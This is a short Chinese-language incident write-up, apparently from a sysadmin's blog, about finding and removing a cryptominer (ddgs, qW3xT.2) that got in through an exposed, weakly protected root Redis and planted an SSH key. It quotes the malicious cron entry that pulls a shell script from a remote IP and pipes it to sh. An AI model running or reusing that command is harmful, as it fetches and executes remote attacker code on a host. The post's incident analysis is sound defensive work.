病毒清除
事情都解決了好多天,今天來總結一下,那天開發問數據備份沒有沒有拉到他們的那台服務器上,於是乎就去看了一下為什么定時任務沒有執行,看了之后,waht???我的定時任務全部沒了,NND
定時任務就只有一個:
*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh
what?下意識的去看了一下cron log,發現出事情了,因為從log來看,(wget) ERROR (getpwnam() failed)是直接寫進/var/spool/cron/root文件的
根據時間去history去翻命令log (histroy加上時間參數還是有作用的), 發現沒有命令往cron寫命令,猜測並不是我們的運維去操作的,再看這個log,發現特么這個ip是美國的,
檢查/root/ssh/下,發現了一個Key,時間正好也和cron上log時間相對於,立馬想到,服務器給攻擊了,,,,
查看腳本內容發現如下:
感情是把我的服務器給當礦機了...MMP,刪除cron的內容,查找ddgs的進程,把它給kill掉,刪除/tmp下的ddgs.3013文件,查看top發現還有一個進程也特么使用率非常高,qW3xT.2 ,同樣的,也給刪除掉,刪除掉/root/下的key,再次檢查一下,發現已經給清掉了,此時,應該查找問題源頭,然后備份重要文件,對服務器進行重新安裝系統,因為,不重裝沒辦法保證徹底清理干凈,so,應急方案得有,一模一樣得服務器一台,有問題,立馬切換接管,平時不用都行,甚至虛擬機都成,作為臨時接管對象。
查找問題源
同樣分析為什么會出現這種情況,能夠清除cron,還能夠往ssh key里面寫內容,唯一能夠想到的,便是redis了,redis是用root登錄的,是有權利寫入ssh key的,,密碼即為簡單,且防火牆允許公網上所有IP連接,於是乎,進入redis,想去看看有沒有什么蛛絲馬跡,遺憾發現沒有什么有用的信息,so,防火牆開放redis的端口對特有的IP開放,其實不僅僅是Redis,各種開放的端口,盡量最小化。